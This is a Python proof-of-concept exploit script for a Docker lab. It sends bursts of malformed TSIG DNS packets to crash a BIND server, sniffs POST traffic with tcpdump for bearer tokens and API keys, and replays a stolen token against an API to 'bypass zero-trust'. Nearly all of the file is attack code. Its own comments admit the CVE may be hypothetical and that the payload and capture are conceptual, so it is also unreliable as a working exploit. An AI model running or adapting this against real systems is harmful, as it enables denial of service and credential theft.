# main.py - PoC Exploit for NHI Secret Manipulation via DNS DoS # Project Objective: # Demonstrate how a DNS DoS can disrupt NHI secret rotation, leading to exposure # or misuse of static/fallback NHIs, bypassing zero-trust policies. # Phase 1: Trigger DNS Server Crash # Goal: Use Scapy to send malformed TSIG DNS queries to a target BIND server. # This should cause a DoS (assertion failure) in BIND 9.20.0. import scapy.all as scapy import time import subprocess import os import json import jwt # For simulating JWTs # --- Configuration --- TARGET_DNS_IP = "172.18.0.2" # Example IP for Dockerized BIND server TARGET_API_IP = "172.18.0.3" # Example IP for Dockerized mock API SECRETS_MANAGER_IP = "172.18.0.4" # Example IP for Dockerized mock secrets manager # Placeholder for the known vulnerable TSIG algorithm ID for CVE-2025-40775 # If this CVE is hypothetical, this ID needs to be carefully chosen or the exploit # adapted for a known BIND TSIG vulnerability (e.g., a fuzzed value causing crash). INVALID_TSIG_ALGORITHM_ID = 255 # Often used for "private use" or invalid IDs # --- Phase 1: Trigger DNS Server Crash --- def trigger_dns_crash(target_ip): print(f"[Phase 1] Attempting to crash BIND DNS server at {target_ip}...") try: # Construct the malformed DNS query with an invalid TSIG algorithm # This payload is conceptual and would need precise tuning for a real CVE. dns_query = scapy.DNSQR(qname="test.example.com", qtype="A") tsig = scapy.TSIG( rrname=".", # TSIG name often '.' for server-to-server or signed updates algorithm=INVALID_TSIG_ALGORITHM_ID, time=int(time.time()), fudge=300, # 5 minutes mac_size=0, # MAC will be invalid due to algorithm, size could be anything mac="", original_id=0, error=0, other_len=0, other="" ) dns_packet = scapy.IP(dst=target_ip)/scapy.UDP(dport=53)/scapy.DNS(qd=dns_query, ar=tsig) # Send the packet (UDP, no response expected if it crashes) scapy.send(dns_packet, verbose=False, count=100) # Send multiple for impact print(f"[Phase 1] Sent malformed TSIG packets to {target_ip}. DNS server should be crashing or become unresponsive.") time.sleep(5) # Give some time for DNS to crash except Exception as e: print(f"[Phase 1] Error sending DNS packets: {e}") # --- Phase 2: Exploit NHI Secret Rotation Failures --- def monitor_and_capture_nhis(): print("[Phase 2] Starting network capture with tcpdump to monitor for NHI secrets...") # This tcpdump command will run in the background. # IMPORTANT: Adjust interface name (eth0) based on your Docker network setup. # This filter aims to capture POST requests over port 443, assuming potential plaintext # or easily extractable data during failures. In reality, you'd need to decrypt TLS # or target non-TLS traffic. pcap_file = "nhis.pcap" tcpdump_cmd = [ "sudo", "tcpdump", "-i", "eth0", "port 443 and (tcp[((tcp[12:1] & 0xf0) >> 4)*4:4] = 0x504f5354)", # Filter for POST "-w", pcap_file, "-n", "-s0" # No name resolution, full packet capture ] try: # Start tcpdump in a subprocess tcpdump_process = subprocess.Popen(tcpdump_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(f"[Phase 2] tcpdump started, capturing to {pcap_file}. Run client/secrets manager simulation now.") # Simulate NHI client attempting rotation here # This part would call a separate client simulation script or function. # For a full PoC, you'd integrate the client that tries to rotate secrets # and falls back to static ones when DNS is down. # Example: simulate_nhi_client_rotation() print("[Phase 2] Simulating NHI client trying to rotate secrets (expecting failures due to DNS DoS)...") # In a real scenario, you'd have your simulated client here # E.g., `os.system(f"python3 client_nhi_rotation.py --secrets-manager-ip {SECRETS_MANAGER_IP}")` time.sleep(30) # Let capture run for a bit while client retries print("[Phase 2] Stopping tcpdump capture.") tcpdump_process.terminate() stdout, stderr = tcpdump_process.communicate(timeout=5) if stdout: print(f"tcpdump stdout:\n{stdout.decode()}") if stderr: print(f"tcpdump stderr:\n{stderr.decode()}") print(f"[Phase 2] Analyzing {pcap_file} for captured NHIs (manual step or using scapy.rdpcap).") # You'd then parse the pcap for relevant data. # Example (conceptual): # packets = scapy.rdpcap(pcap_file) # for packet in packets: # if packet.haslayer(scapy.Raw): # raw_data = packet[scapy.Raw].load.decode(errors='ignore') # if "Authorization: Bearer" in raw_data or "api_key=" in raw_data: # print(f"Potential NHI found: {raw_data}") except FileNotFoundError: print("[ERROR] tcpdump command not found. Ensure tcpdump is installed and in PATH.") except Exception as e: print(f"[ERROR] An error occurred during tcpdump operation: {e}") # --- Phase 3: Bypass Zero-Trust Policies --- def bypass_zero_trust_with_nhi(stolen_nhi_token): print(f"[Phase 3] Attempting to bypass Zero-Trust using stolen NHI: {stolen_nhi_token[:20]}...") try: # Simulate forging a JWT if the stolen_nhi is a signing key (more advanced) # For this example, assume stolen_nhi_token is already the 'bearer' token or API key if stolen_nhi_token.startswith("eyJ"): # Simple check for JWT structure print("[Phase 3] Treating stolen NHI as a JWT token.") # Verify the token (if we had the public key/secret) - conceptual # decoded_token = jwt.decode(stolen_nhi_token, "your-secret", algorithms=["HS256"]) # print(f"Decoded JWT: {decoded_token}") # Use requests to simulate curl import requests headers = { "Authorization": f"Bearer {stolen_nhi_token}", "Content-Type": "application/json" } # Assuming a mock API is running on TARGET_API_IP api_url = f"http://{TARGET_API_IP}:5000/v1/secrets" # Mock API endpoint print(f"[Phase 3] Sending authenticated request to {api_url}...") response = requests.get(api_url, headers=headers) if response.status_code == 200: print(f"[Phase 3] Successfully accessed restricted API! Response: {response.json()}") print("[Phase 3] Zero-Trust policy bypassed.") else: print(f"[Phase 3] Failed to access restricted API. Status: {response.status_code}, Response: {response.text}") print("[Phase 3] Zero-Trust bypass attempt failed (or NHI was invalid/expired).") except ImportError: print("[ERROR] 'requests' library not found. Install with 'pip install requests PyJWT'.") except Exception as e: print(f"[Phase 3] Error during API access: {e}") # --- Main Execution Flow --- if __name__ == "__main__": print("--- Starting NHI Zero-Trust Bypass PoC ---") # Ensure Docker containers are up before running this script print("\n[INFO] Please ensure your Docker environment (BIND, Secrets Manager, Mock API) is running.") print(" You may need to run 'docker-compose up -d' first.") input("Press Enter to continue after verifying Docker containers are running...") # Phase 1 trigger_dns_crash(TARGET_DNS_IP) # Phase 2 monitor_and_capture_nhis() print("\n[INFO] Manual step: Review nhis.pcap for captured secrets. If a secret is found, provide it for Phase 3.") # For demonstration, let's assume we "found" a static key for now # In a real PoC, you'd parse the pcap or have the client script expose it. assumed_stolen_nhi = "stolen_api_key_from_fallback_mechanism_XYZ123ABC" # Replace with actual captured key if possible # Or, if simulating JWTs and a signing key was "leaked" # signing_secret = "your_secret_key_for_jwt" # assumed_stolen_jwt = jwt.encode({"role": "admin", "exp": time.time() + 3600}, signing_secret, algorithm="HS256") # print(f"Simulated forged JWT: {assumed_stolen_jwt}") if assumed_stolen_nhi: # Phase 3 bypass_zero_trust_with_nhi(assumed_stolen_nhi) else: print("[Phase 3] No NHI found or provided. Cannot proceed with Zero-Trust bypass.") print("\n--- PoC Execution Complete ---")